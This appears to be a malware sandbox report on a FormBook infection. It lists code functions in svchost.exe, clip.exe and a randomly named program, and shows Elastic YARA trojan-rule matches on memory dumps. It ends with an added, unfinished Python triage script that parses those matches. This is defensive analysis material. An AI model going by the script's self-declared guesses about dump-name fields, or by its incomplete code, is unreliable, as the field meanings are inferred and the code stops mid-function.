Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004026C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042E723
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C003E6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFA352
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC02C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF41A2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C001AA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF81CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B30100
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC8158
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3C7C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B64750
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B5C6E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C00591
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BEE4F6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE4420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF2446
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF6BD7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFAB40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C0A9A6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B56962
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B268B8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6E8F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B4A840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B42840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BBEFA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B4CFE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B32FC8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B60F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE2F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B82F28
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB4F40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B52E90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFCE93
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFEEDB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFEE26
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B40E59
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B58DBF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3ADE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDCD1F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B4AD00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE0CB5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B30CF2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B40C00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B8739A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2D34C2_2_03B2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B452A02_2_03B452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE12ED2_2_03BE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5B2C02_2_03B5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4B1B02_2_03B4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0B16B2_2_03C0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F1722_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7516C2_2_03B7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF70E92_2_03BF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFF0E02_2_03BFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEF0CC2_2_03BEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C02_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFF7B02_2_03BFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF16CC2_2_03BF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B856302_2_03B85630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C095C32_2_03C095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDD5B02_2_03BDD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF75712_2_03BF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFF43F2_2_03BFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B314602_2_03B31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5FB802_2_03B5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB5BF02_2_03BB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7DBF92_2_03B7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFB762_2_03BFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDDAAC2_2_03BDDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B85AA02_2_03B85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE1AA32_2_03BE1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEDAC62_2_03BEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB3A6C2_2_03BB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFA492_2_03BFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF7A462_2_03BF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD59102_2_03BD5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B499502_2_03B49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5B9502_2_03B5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B438E02_2_03B438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAD8002_2_03BAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFFB12_2_03BFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41F922_2_03B41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFF092_2_03BFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B49EB02_2_03B49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5FDC02_2_03B5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF7D732_2_03BF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF1D5A2_2_03BF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B43D402_2_03B43D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFCF22_2_03BFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB9C322_2_03BB9C32
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeCode function: 4_2_04E98D804_2_04E98D80
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeCode function: 4_2_04EA14AF4_2_04EA14AF
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeCode function: 4_2_04E9AD5F4_2_04E9AD5F
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeCode function: 4_2_04EB98AF4_2_04EB98AF
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeCode function: 4_2_04EA32C94_2_04EA32C9
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeCode function: 4_2_04E9AB3F4_2_04E9AB3F
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeCode function: 4_2_04E9AB364_2_04E9AB36
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045D24465_2_045D2446
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045CE4F65_2_045CE4F6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045205355_2_04520535
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045E05915_2_045E0591
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0453C6E05_2_0453C6E0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045447505_2_04544750
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045207705_2_04520770
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0451C7C05_2_0451C7C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045B20005_2_045B2000
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045A81585_2_045A8158
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045BA1185_2_045BA118
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045101005_2_04510100
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045D81CC5_2_045D81CC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045E01AA5_2_045E01AA
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045C02745_2_045C0274
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045A02C05_2_045A02C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045DA3525_2_045DA352
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0452E3F05_2_0452E3F0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045E03E65_2_045E03E6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04520C005_2_04520C00
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04510CF25_2_04510CF2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045C0CB55_2_045C0CB5
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0452AD005_2_0452AD00
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0451ADE05_2_0451ADE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04538DBF5_2_04538DBF
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04520E595_2_04520E59
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045DEE265_2_045DEE26
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045DEEDB5_2_045DEEDB
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04532E905_2_04532E90
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045DCE935_2_045DCE93
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04594F405_2_04594F40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04540F305_2_04540F30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04562F285_2_04562F28
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04512FC85_2_04512FC8
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0452CFE05_2_0452CFE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0459EFA05_2_0459EFA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045228405_2_04522840
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0452A8405_2_0452A840
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0454E8F05_2_0454E8F0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045068B85_2_045068B8
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045369625_2_04536962
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045229A05_2_045229A0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045EA9A65_2_045EA9A6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0451EA805_2_0451EA80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045DAB405_2_045DAB40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045D6BD75_2_045D6BD7
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045114605_2_04511460
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045DF43F5_2_045DF43F
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045D75715_2_045D7571
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045BD5B05_2_045BD5B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045D16CC5_2_045D16CC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045DF7B05_2_045DF7B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045CF0CC5_2_045CF0CC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045270C05_2_045270C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045D70E95_2_045D70E9
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045DF0E05_2_045DF0E0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0450F1725_2_0450F172
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045EB16B5_2_045EB16B
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0455516C5_2_0455516C
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0452B1B05_2_0452B1B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0453B2C05_2_0453B2C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045C12ED5_2_045C12ED
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045252A05_2_045252A0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0450D34C5_2_0450D34C
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045D132D5_2_045D132D
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0456739A5_2_0456739A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04599C325_2_04599C32
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045DFCF25_2_045DFCF2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045D1D5A5_2_045D1D5A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04523D405_2_04523D40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045D7D735_2_045D7D73
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0453FDC05_2_0453FDC0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04529EB05_2_04529EB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045DFF095_2_045DFF09
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_044E3FD55_2_044E3FD5
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_044E3FD25_2_044E3FD2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04521F925_2_04521F92
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045DFFB15_2_045DFFB1
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0458D8005_2_0458D800
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045238E05_2_045238E0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045299505_2_04529950
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0453B9505_2_0453B950
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045B59105_2_045B5910
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045DFA495_2_045DFA49
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045D7A465_2_045D7A46
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04593A6C5_2_04593A6C
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045CDAC65_2_045CDAC6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04565AA05_2_04565AA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045BDAAC5_2_045BDAAC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045DFB765_2_045DFB76
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04595BF05_2_04595BF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0455DBF95_2_0455DBF9
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0453FB805_2_0453FB80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_003417A05_2_003417A0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_003430505_2_00343050
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0035B4505_2_0035B450
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0033C6E05_2_0033C6E0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0033C6D75_2_0033C6D7
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0033A9215_2_0033A921
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0033C9005_2_0033C900
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0033A9805_2_0033A980
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_00344E705_2_00344E70
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0438E44B5_2_0438E44B
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0438E5635_2_0438E563
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0438CC485_2_0438CC48
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0438E9055_2_0438E905
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0438D9685_2_0438D968
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0438CBD45_2_0438CBD4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BBF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B2B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B87E54 appears 111 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 0458EA12 appears 86 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 0450B970 appears 275 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04567E54 appears 99 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 0459F290 appears 105 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04555130 appears 48 times
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: String function: 009DF9F2 appears 40 times
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: String function: 009C9CB3 appears 31 times
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: String function: 009E0A30 appears 46 times
            Source: plZuPtZoTk.exe, 00000000.00000003.1462141070.0000000004023000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs plZuPtZoTk.exe
            Source: plZuPtZoTk.exe, 00000000.00000003.1463967810.00000000041CD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs plZuPtZoTk.exe
            Source: plZuPtZoTk.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3281124203.0000000000330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1911723289.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1911428216.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.3285172725.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3283463490.0000000004280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3283258223.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1912223834.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3282844800.0000000004B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
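The ten match rows above tell where the Elastic FormBook rule fired but leave the dump names to be decoded by hand. The Python below is an added example, not part of the Joe Sandbox report and not Elastic's rule; it parses those rows and summarises, per process index, which memory regions matched and which of them are writable and executable. It assumes that in a `.sdmp` name the fourth field is the region base address, the fifth the Win32 page protection and the seventh the memory type. That reading is inferred from the values on this page (0x40/0x04 and 0x40000/0x20000/0x1000000 line up with the winnt.h constants) and is not documented in the report; the other fields are left undecoded. The rule metadata in the embedded rows is shortened to the keys the code uses.

```python
"""Triage of the YARA match rows in a Joe Sandbox report (added example, not report code)."""
import re
from collections import defaultdict

# winnt.h constants used to decode two of the dump-name fields.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# One row: "Source: <dump>, type: <KIND>Matched rule: <rule> <k = v, ...>".
# The separator before "Matched rule" is tolerated whether or not extraction kept it.
ROW_RE = re.compile(r"Source:\s*(\S+?)[,\s|]+type:\s*([A-Z]+)\W*Matched rule:\s*(\S+)\s*(.*)$")
# Memory dump name: proc.stage.seq.base.prot.f6.type.f8.sdmp
# ASSUMPTION: field 5 is the page protection and field 7 the memory type; inferred from
# the values on the page, not documented by the sandbox. Fields 2, 3, 6 and 8 are not decoded.
SDMP_RE = re.compile(r"^(\d{8})\.(\d{8})\.(\d+)\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})"
                     r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$")
# Unpacked PE name: proc.stage.image.base.n[.raw].unpack
UNPACK_RE = re.compile(r"^(\d+)\.(\d+)\.(.+?)\.([0-9A-Fa-f]+)\.(\d+)(\.raw)?\.unpack$")


def parse_meta(text):
    """'k = v, k2 = v2' -> dict (rule metadata as printed in the report)."""
    out = {}
    for part in text.split(", "):
        if " = " in part:
            k, v = part.split(" = ", 1)
            out[k.strip()] = v.strip()
    return out


def parse_row(line):
    """Return a dict for one match row, or None if the line is not a match row."""
    m = ROW_RE.search(line)
    if not m:
        return None
    src, kind, rule, meta = m.groups()
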